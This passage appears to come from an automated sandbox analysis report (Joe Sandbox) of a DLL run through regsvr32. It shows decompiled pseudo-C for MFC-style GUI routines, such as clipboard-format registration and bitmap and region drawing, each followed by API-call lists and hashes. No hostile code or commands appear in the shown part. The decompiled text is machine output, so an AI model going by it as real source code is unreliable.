                                                                                                                						E1000A069(__ebx, 0x100bdc04, 0, _t68, __eflags);
                                                                                                                					}
                                                                                                                					__eflags =  *(_t68 + 0x18);
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__eflags = E10014011(_t54, 0, _t68, __eflags, _a4);
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t54 =  *(_t68 + 0x18);
                                                                                                                							L10014FB7( *(_t68 + 0x18), __eflags, _a4);
                                                                                                                							 *(_t68 + 0x18) = 0;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_push(_t51);
                                                                                                                					_t52 = _a8;
                                                                                                                					__eflags = _t52 - 0x110;
                                                                                                                					if(_t52 != 0x110) {
                                                                                                                						__eflags = _t52 -  *0x100bdf30; // 0x0
                                                                                                                						if(__eflags == 0) {
                                                                                                                							L25:
                                                                                                                							SendMessageA(_a4, 0x111, 0xe146, 0);
                                                                                                                							_t31 = 1;
                                                                                                                							__eflags = 1;
                                                                                                                							goto L26;
                                                                                                                						}
                                                                                                                						__eflags = _t52 - 0x111;
                                                                                                                						if(_t52 != 0x111) {
                                                                                                                							L12:
                                                                                                                							__eflags = _t52 - 0xc000;
                                                                                                                							if(__eflags < 0) {
                                                                                                                								L22:
                                                                                                                								_t31 = 0;
                                                                                                                								goto L26;
                                                                                                                							}
                                                                                                                							_t70 = E10014011(_t54, 0x110, _t68, __eflags, _a4);
                                                                                                                							__eflags = _t70;
                                                                                                                							if(_t70 == 0) {
                                                                                                                								goto L22;
                                                                                                                							}
                                                                                                                							_t33 = E100203AA(_t70, 0x1009eb24);
                                                                                                                							__eflags = _t33;
                                                                                                                							if(_t33 == 0) {
                                                                                                                								L16:
                                                                                                                								__eflags = _t52 -  *0x100bdf24; // 0x0
                                                                                                                								if(__eflags != 0) {
                                                                                                                									__eflags = _t52 -  *0x100bdf28; // 0x0
                                                                                                                									if(__eflags != 0) {
                                                                                                                										__eflags = _t52 -  *0x100bdf20; // 0x0
                                                                                                                										if(__eflags != 0) {
                                                                                                                											__eflags = _t52 -  *0x100bdf2c; // 0x0
                                                                                                                											if(__eflags != 0) {
                                                                                                                												goto L22;
                                                                                                                											}
                                                                                                                											_t31 =  *((intOrPtr*)( *_t70 + 0x15c))();
                                                                                                                											goto L26;
                                                                                                                										}
                                                                                                                										_t58 = _a16 >> 0x10;
                                                                                                                										__eflags = _t58;
                                                                                                                										 *((intOrPtr*)( *_t70 + 0x164))(_a12, _a16 & 0x0000ffff, _t58);
                                                                                                                										goto L22;
                                                                                                                									}
                                                                                                                									_t19 = _t70 + 0x1c4; // 0x1c4
                                                                                                                									_t66 = _t19;
                                                                                                                									 *_t66 = _a16;
                                                                                                                									_t31 =  *((intOrPtr*)( *_t70 + 0x160))();
                                                                                                                									 *_t66 =  *_t66 & 0x00000000;
                                                                                                                									goto L26;
                                                                                                                								}
                                                                                                                								_t31 =  *((intOrPtr*)( *_t70 + 0x15c))(_a16);
                                                                                                                								goto L26;
                                                                                                                							}
                                                                                                                							_t40 = E10037F5D(_t70);
                                                                                                                							__eflags =  *(_t40 + 0x34) & 0x00080000;
                                                                                                                							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
                                                                                                                								goto L22;
                                                                                                                							}
                                                                                                                							goto L16;
                                                                                                                						}
                                                                                                                						__eflags = _a12 - 0x40e;
                                                                                                                						if(_a12 == 0x40e) {
                                                                                                                							goto L25;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					} else {
                                                                                                                						 *0x100bdf20 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
                                                                                                                						 *0x100bdf24 = RegisterClipboardFormatA("commdlg_ShareViolation");
                                                                                                                						 *0x100bdf28 = RegisterClipboardFormatA("commdlg_FileNameOK");
                                                                                                                						 *0x100bdf2c = RegisterClipboardFormatA("commdlg_ColorOK");
                                                                                                                						 *0x100bdf30 = RegisterClipboardFormatA("commdlg_help");
                                                                                                                						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
                                                                                                                						_push(_a16);
                                                                                                                						 *0x100bdf34 = _t46;
                                                                                                                						_push(_a12);
                                                                                                                						_t31 = E1001B5C0(_t54, 0x110, RegisterWindowMessageA, _a4, 0x110);
                                                                                                                						L26:
                                                                                                                						return _t31;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 1003FFA6
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 1003FFB2
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 1003FFBE
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 1003FFCA
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_help), ref: 1003FFD6
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1003FFE2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFormatRegister
                                                                                                                • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                                • API String ID: 1228543026-3888057576
                                                                                                                • Opcode ID: 78b52f88f7b3ac91f3cc894954dfef21359b3b53205421f08440025b00c23b84
                                                                                                                • Instruction ID: 362deadbe15acc06b87cc667881c5110df2592d32378ddc96c768b07699d1440
                                                                                                                • Opcode Fuzzy Hash: 78b52f88f7b3ac91f3cc894954dfef21359b3b53205421f08440025b00c23b84
                                                                                                                • Instruction Fuzzy Hash: 9741A9345043569FDB21EF60CC84AAE7BE1FF48390F21053AF945AB261E7719890DBA6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E1003E25A(signed int _a4, signed int _a8, struct HDC__* _a12) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				void* _v20;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t52;
                                                                                                                				void* _t53;
                                                                                                                				void* _t56;
                                                                                                                				signed int _t63;
                                                                                                                				struct HDC__* _t64;
                                                                                                                				struct HBITMAP__* _t65;
                                                                                                                				struct HDC__* _t69;
                                                                                                                				void* _t76;
                                                                                                                				struct HDC__* _t79;
                                                                                                                				intOrPtr* _t82;
                                                                                                                				void* _t91;
                                                                                                                				signed int _t92;
                                                                                                                				intOrPtr _t100;
                                                                                                                				int* _t101;
                                                                                                                				int _t102;
                                                                                                                				void* _t103;
                                                                                                                				BITMAPINFO* _t104;
                                                                                                                				void* _t106;
                                                                                                                
                                                                                                                				_t52 = LoadResource(_a4, _a8);
                                                                                                                				_v20 = _t52;
                                                                                                                				if(_t52 == 0) {
                                                                                                                					return _t52;
                                                                                                                				}
                                                                                                                				_t53 = LockResource(_t52);
                                                                                                                				_t76 = _t53;
                                                                                                                				_v16 = _t76;
                                                                                                                				if(_t76 == 0) {
                                                                                                                					L17:
                                                                                                                					return _t53;
                                                                                                                				}
                                                                                                                				_push(_t103);
                                                                                                                				_t98 =  *_t76 + 0x40;
                                                                                                                				_t53 = E10047026(_t76, _t91,  *_t76 + 0x40, _t103,  *_t76 + 0x40);
                                                                                                                				_t104 = _t53;
                                                                                                                				if(_t104 == 0) {
                                                                                                                					L16:
                                                                                                                					goto L17;
                                                                                                                				} else {
                                                                                                                					E1000A7FB(_t98, _t104, _t106, _t104, _t98, _t76, _t98);
                                                                                                                					_t56 = _t104 + _t104->bmiHeader;
                                                                                                                					_a8 = _a8 & 0x00000000;
                                                                                                                					_v12 = _t56;
                                                                                                                					do {
                                                                                                                						_t82 = _t56 + _a8 * 4;
                                                                                                                						_t100 =  *_t82;
                                                                                                                						_t92 = 0;
                                                                                                                						_v8 = _t82;
                                                                                                                						while(_t100 !=  *((intOrPtr*)(0x1009f454 + _t92 * 8))) {
                                                                                                                							_t92 = _t92 + 1;
                                                                                                                							if(_t92 < 4) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						__eflags = _a12;
                                                                                                                						if(_a12 == 0) {
                                                                                                                							_t101 = 0x1009f458 + _t92 * 8;
                                                                                                                							_a4 = GetSysColor( *_t101) & 0x000000ff;
                                                                                                                							GetSysColor( *_t101);
                                                                                                                							_a4 = _a4 << 8;
                                                                                                                							_t63 = GetSysColor( *_t101) >> 0x00000010 & 0x000000ff | _a4;
                                                                                                                							__eflags = _t63;
                                                                                                                							 *_v8 = _t63;
                                                                                                                							_t56 = _v12;
                                                                                                                						} else {
                                                                                                                							__eflags =  *(0x1009f458 + _t92 * 8) - 0x12;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								 *_t82 = 0xffffff;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L12:
                                                                                                                						_a8 = _a8 + 1;
                                                                                                                					} while (_a8 < 0x10);
                                                                                                                					_t102 = _t104->bmiHeader.biWidth;
                                                                                                                					_t79 = _t104->bmiHeader.biHeight;
                                                                                                                					_a4 = _t102;
                                                                                                                					_a8 = _t79;
                                                                                                                					_t64 = GetDC(0);
                                                                                                                					_a12 = _t64;
                                                                                                                					_t65 = CreateCompatibleBitmap(_t64, _t102, _t79);
                                                                                                                					_v8 = _t65;
                                                                                                                					if(_t65 != 0) {
                                                                                                                						_t69 = CreateCompatibleDC(_a12);
                                                                                                                						_t102 = SelectObject;
                                                                                                                						_t79 = _t69;
                                                                                                                						_v12 = SelectObject(_t79, _v8);
                                                                                                                						StretchDIBits(_t79, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v16 + 0x28 + (1 << _t104->bmiHeader.biBitCount) * 4, _t104, 0, 0xcc0020);
                                                                                                                						SelectObject(_t79, _v12);
                                                                                                                						DeleteDC(_t79);
                                                                                                                					}
                                                                                                                					ReleaseDC(0, _a12);
                                                                                                                					_push(_t104);
                                                                                                                					E100470E9(_t79, _t102, _t104, 0);
                                                                                                                					FreeResource(_v20);
                                                                                                                					_t53 = _v8;
                                                                                                                					goto L16;
                                                                                                                				}
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • LoadResource.KERNEL32(?,?), ref: 1003E266
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1003E279
                                                                                                                • _malloc.LIBCMT ref: 1003E294
                                                                                                                  • Part of subcall function 10047026: __FF_MSGBANNER.LIBCMT ref: 10047049
                                                                                                                  • Part of subcall function 10047026: __NMSG_WRITE.LIBCMT ref: 10047050
                                                                                                                  • Part of subcall function 10047026: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001), ref: 1004709E
                                                                                                                  • Part of subcall function 1000A7FB: _memcpy_s.LIBCMT ref: 1000A80B
                                                                                                                • GetSysColor.USER32 ref: 1003E300
                                                                                                                • GetSysColor.USER32 ref: 1003E30A
                                                                                                                • GetSysColor.USER32 ref: 1003E31C
                                                                                                                • GetDC.USER32(00000000), ref: 1003E346
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1003E352
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1003E362
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1003E374
                                                                                                                • StretchDIBits.GDI32(00000000,00000000,00000000,00000008,00000010,00000000,00000000,00000008,00000010,?,00000000,00000000,00CC0020), ref: 1003E3A3
                                                                                                                • SelectObject.GDI32(00000000,00000008), ref: 1003E3AD
                                                                                                                • DeleteDC.GDI32(00000000), ref: 1003E3B0
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1003E3BB
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 1003E3CB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorResource$CompatibleCreateObjectSelect$AllocateBitmapBitsDeleteFreeHeapLoadLockReleaseStretch_malloc_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 2870220007-0
                                                                                                                • Opcode ID: 6d0353da55908fa1d7fa2fca56e87630e8cd8c4d44a627cf339c2c26641931c0
                                                                                                                • Instruction ID: 846dad1bffad77f9de73737dced2376ddc84ebc6593853536fcd04f89a08638a
                                                                                                                • Opcode Fuzzy Hash: 6d0353da55908fa1d7fa2fca56e87630e8cd8c4d44a627cf339c2c26641931c0
                                                                                                                • Instruction Fuzzy Hash: EF416D75900219EFEB01DFA4CC849AE7BB9FF49341F108469F9169B2A1DB31EA10DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E1000DAF6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t144;
                                                                                                                				void* _t146;
                                                                                                                				intOrPtr _t151;
                                                                                                                				intOrPtr _t152;
                                                                                                                				intOrPtr _t153;
                                                                                                                				intOrPtr _t154;
                                                                                                                				void* _t206;
                                                                                                                
                                                                                                                				_t195 = __edi;
                                                                                                                				_push(0x6c);
                                                                                                                				E1004764D(0x1008e153, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t206 - 0x40)) = 0x1009a2fc;
                                                                                                                				 *(_t206 - 0x3c) = 0;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x38)) = 0;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x34)) = 0;
                                                                                                                				 *(_t206 - 4) = 0;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x50)) = 0x1009a2fc;
                                                                                                                				 *(_t206 - 0x4c) = 0;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x48)) = 0;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x44)) = 0;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x30)) = 0x1009a2fc;
                                                                                                                				 *(_t206 - 0x2c) = 0;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x28)) = 0;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x24)) = 0;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x14)) = 0;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x18)) = 0x10098d24;
                                                                                                                				 *(_t206 - 0x1c) = 0;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x20)) = 0x1009831c;
                                                                                                                				 *(_t206 - 4) = 4;
                                                                                                                				if(E1000CCDC(_t206 - 0x40, __edi, _t206, CreateCompatibleDC(0)) != 0 && E1000CCDC(_t206 - 0x50, __edi, _t206, CreateCompatibleDC(0)) != 0 && E1000CCDC(_t206 - 0x30, _t195, _t206, CreateCompatibleDC(0)) != 0 && GetObjectA( *( *((intOrPtr*)(_t206 + 8)) + 4), 0x18, _t206 - 0x78) != 0) {
                                                                                                                					L1000CFF6( *((intOrPtr*)(_t206 + 0xc)));
                                                                                                                					if(L1000111D( *((intOrPtr*)(_t206 + 0xc)),  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x68) & 0x0000ffff,  *(_t206 - 0x66) & 0x0000ffff, 0) != 0) {
                                                                                                                						L1000CFA3(_t206 - 0x18, 1, _t206, CreateBitmap(8, 8, 1, 1, 0x1009a504));
                                                                                                                						E1000D03E(_t206 - 0x20, _t206 - 0x18);
                                                                                                                						L1000CFF6(_t206 - 0x18);
                                                                                                                						L1000CFA3(_t206 - 0x18, 1, _t206, CreateBitmap( *(_t206 - 0x74),  *(_t206 - 0x70), 1, 1, 0));
                                                                                                                						 *((intOrPtr*)(_t206 + 8)) = E1000D0A1( *(_t206 - 0x3c),  *( *((intOrPtr*)(_t206 + 8)) + 4));
                                                                                                                						_t144 = E1000D0A1( *(_t206 - 0x4c),  *((intOrPtr*)(_t206 - 0x14)));
                                                                                                                						 *((intOrPtr*)(_t206 - 0x10)) = _t144;
                                                                                                                						if( *((intOrPtr*)(_t206 + 8)) != 0 && _t144 != 0) {
                                                                                                                							_t146 = E1000BD03(GetPixel( *(_t206 - 0x3c), 0, 0), _t206 - 0x40, _t145);
                                                                                                                							E1000BD03(BitBlt( *(_t206 - 0x4c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x3c), 0, 0, 0xcc0020), _t206 - 0x40, 0xffffff);
                                                                                                                							E1000BD03(BitBlt( *(_t206 - 0x4c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x3c), 0, 0, 0xee0086), _t206 - 0x40, _t146);
                                                                                                                							_t151 =  *((intOrPtr*)(_t206 + 0xc));
                                                                                                                							if(_t151 != 0) {
                                                                                                                								_t152 =  *((intOrPtr*)(_t151 + 4));
                                                                                                                							} else {
                                                                                                                								_t152 = 0;
                                                                                                                							}
                                                                                                                							_t153 = E1000D0A1( *(_t206 - 0x2c), _t152);
                                                                                                                							 *((intOrPtr*)(_t206 + 0xc)) = _t153;
                                                                                                                							if(_t153 == 0) {
                                                                                                                								_t154 = 0;
                                                                                                                							} else {
                                                                                                                								 *((intOrPtr*)(_t206 + 0x14)) = E1000BD03(E1000BDEA(_t153, _t206 - 0x30,  *((intOrPtr*)(_t206 + 0x10))), _t206 - 0x30,  *((intOrPtr*)(_t206 + 0x14)));
                                                                                                                								 *(_t206 - 0x58) =  *(_t206 - 0x74);
                                                                                                                								 *(_t206 - 0x54) =  *(_t206 - 0x70);
                                                                                                                								 *(_t206 - 0x60) = 0;
                                                                                                                								 *((intOrPtr*)(_t206 - 0x5c)) = 0;
                                                                                                                								E1000BD03(E1000BDEA(FillRect( *(_t206 - 0x2c), _t206 - 0x60,  *(_t206 - 0x1c)), _t206 - 0x30, _t160), _t206 - 0x30,  *((intOrPtr*)(_t206 + 0x14)));
                                                                                                                								BitBlt( *(_t206 - 0x2c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x3c), 0, 0, 0x660046);
                                                                                                                								BitBlt( *(_t206 - 0x2c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x4c), 0, 0, 0x8800c6);
                                                                                                                								BitBlt( *(_t206 - 0x2c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x3c), 0, 0, 0x660046);
                                                                                                                								_t154 =  *((intOrPtr*)( *((intOrPtr*)(_t206 + 0xc)) + 4));
                                                                                                                							}
                                                                                                                							E1000D0A1( *(_t206 - 0x2c), _t154);
                                                                                                                							E1000D0A1( *(_t206 - 0x4c),  *((intOrPtr*)( *((intOrPtr*)(_t206 - 0x10)) + 4)));
                                                                                                                							E1000D0A1( *(_t206 - 0x3c),  *( *((intOrPtr*)(_t206 + 8)) + 4));
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *(_t206 - 4) = 3;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x20)) = 0x10098308;
                                                                                                                				L1000CFF6(_t206 - 0x20);
                                                                                                                				 *(_t206 - 4) = 2;
                                                                                                                				 *((intOrPtr*)(_t206 - 0x18)) = 0x10098308;
                                                                                                                				L1000CFF6(_t206 - 0x18);
                                                                                                                				 *(_t206 - 4) = 1;
                                                                                                                				L1000CD56(_t206 - 0x30);
                                                                                                                				 *(_t206 - 4) = 0;
                                                                                                                				L1000CD56(_t206 - 0x50);
                                                                                                                				 *(_t206 - 4) =  *(_t206 - 4) | 0xffffffff;
                                                                                                                				return E10047725(L1000CD56(_t206 - 0x40));
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000DAFD
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1000DB4F
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1000DB63
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1000DB77
                                                                                                                • GetObjectA.GDI32(00000004,00000018,?), ref: 1000DB96
                                                                                                                • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,1009A504), ref: 1000DBE1
                                                                                                                  • Part of subcall function 1000D03E: CreatePatternBrush.GDI32(?), ref: 1000D04D
                                                                                                                  • Part of subcall function 1000CFF6: DeleteObject.GDI32(00000000), ref: 1000D005
                                                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1000DC09
                                                                                                                  • Part of subcall function 1000D0A1: SelectObject.GDI32(?,?), ref: 1000D0A9
                                                                                                                • GetPixel.GDI32(?,00000000,00000000), ref: 1000DC49
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD1D
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD2B
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1000DC75
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 1000DC99
                                                                                                                • FillRect.USER32(?,?,?), ref: 1000DCFD
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 1000DD2D
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,008800C6), ref: 1000DD44
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 1000DD57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create$CompatibleObject$BitmapColor$BrushDeleteFillH_prolog3PatternPixelRectSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3108931702-0
                                                                                                                • Opcode ID: d69e9ac2f5f3e8df1549bcf97479c8da18a1381973d928e60a607054227e66a4
                                                                                                                • Instruction ID: 95502b3af191cccb2c1e05c6da46a113522f07a2ea566406e8f46ae750dbc02a
                                                                                                                • Opcode Fuzzy Hash: d69e9ac2f5f3e8df1549bcf97479c8da18a1381973d928e60a607054227e66a4
                                                                                                                • Instruction Fuzzy Hash: 1091D275C0021DAEEF11EFA5CC81DEEBBB9FF08280F10812AF519A6165DB319E11DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E1001FE7B(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t135;
                                                                                                                				intOrPtr _t194;
                                                                                                                				intOrPtr* _t228;
                                                                                                                				void* _t230;
                                                                                                                				intOrPtr _t233;
                                                                                                                
                                                                                                                				_push(0x38);
                                                                                                                				E1004764D(0x1008f4d0, __ebx, __edi, __esi);
                                                                                                                				_t228 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x30)) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x34)) = 0x1009b784;
                                                                                                                				 *(_t230 - 4) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x28)) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x2c)) = 0x1009b784;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x20)) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x24)) = 0x1009b784;
                                                                                                                				 *(_t230 - 4) = 2;
                                                                                                                				L1000EF50(_t230 - 0x2c,  *(_t230 + 8));
                                                                                                                				CopyRect(_t230 - 0x44,  *(_t230 + 8));
                                                                                                                				InflateRect(_t230 - 0x44,  ~( *(_t230 + 0xc)),  ~( *(_t230 + 0x10)));
                                                                                                                				IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 8));
                                                                                                                				L1000CFA3(_t230 - 0x24, 0x1009b784, _t230, CreateRectRgnIndirect(_t230 - 0x44));
                                                                                                                				L1000CFA3(_t230 - 0x34, 0x1009b784, _t230, CreateRectRgn(0, 0, 0, 0));
                                                                                                                				E1001FC40(_t230 - 0x34, _t230 - 0x2c, _t230 - 0x24, 3);
                                                                                                                				_t232 =  *((intOrPtr*)(_t230 + 0x20));
                                                                                                                				if( *((intOrPtr*)(_t230 + 0x20)) == 0) {
                                                                                                                					 *((intOrPtr*)(_t230 + 0x20)) = E1001FDD8(0, 0x1009b784, _t228, _t232);
                                                                                                                				}
                                                                                                                				_t194 =  *((intOrPtr*)(_t230 + 0x20));
                                                                                                                				_t233 = _t194;
                                                                                                                				_t234 = _t233 == 0;
                                                                                                                				if(_t233 == 0) {
                                                                                                                					E1000A069(0, _t194, 0x1009b784, _t228, _t234);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t230 + 0x24)) == 0) {
                                                                                                                					 *((intOrPtr*)(_t230 + 0x24)) = _t194;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t230 - 0x18)) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x1c)) = 0x1009b784;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x10)) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x14)) = 0x1009b784;
                                                                                                                				 *(_t230 - 4) = 4;
                                                                                                                				if( *(_t230 + 0x14) != 0) {
                                                                                                                					L1000CFA3(_t230 - 0x1c, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
                                                                                                                					E1001FC25(_t230 - 0x2c,  *(_t230 + 0x14));
                                                                                                                					CopyRect(_t230 - 0x44,  *(_t230 + 0x14));
                                                                                                                					InflateRect(_t230 - 0x44,  ~( *(_t230 + 0x18)),  ~( *(_t230 + 0x1c)));
                                                                                                                					IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 0x14));
                                                                                                                					E1001FC25(_t230 - 0x24, _t230 - 0x44);
                                                                                                                					E1001FC40(_t230 - 0x1c, _t230 - 0x2c, _t230 - 0x24, 3);
                                                                                                                					if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4))) {
                                                                                                                						L1000CFA3(_t230 - 0x14, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
                                                                                                                						E1001FC40(_t230 - 0x14, _t230 - 0x1c, _t230 - 0x34, 3);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4)) &&  *(_t230 + 0x14) != 0) {
                                                                                                                					E1000C878(_t228, _t230 - 0x1c);
                                                                                                                					 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
                                                                                                                					 *(_t230 + 0x14) = E1000D13A(_t228,  *((intOrPtr*)(_t230 + 0x24)));
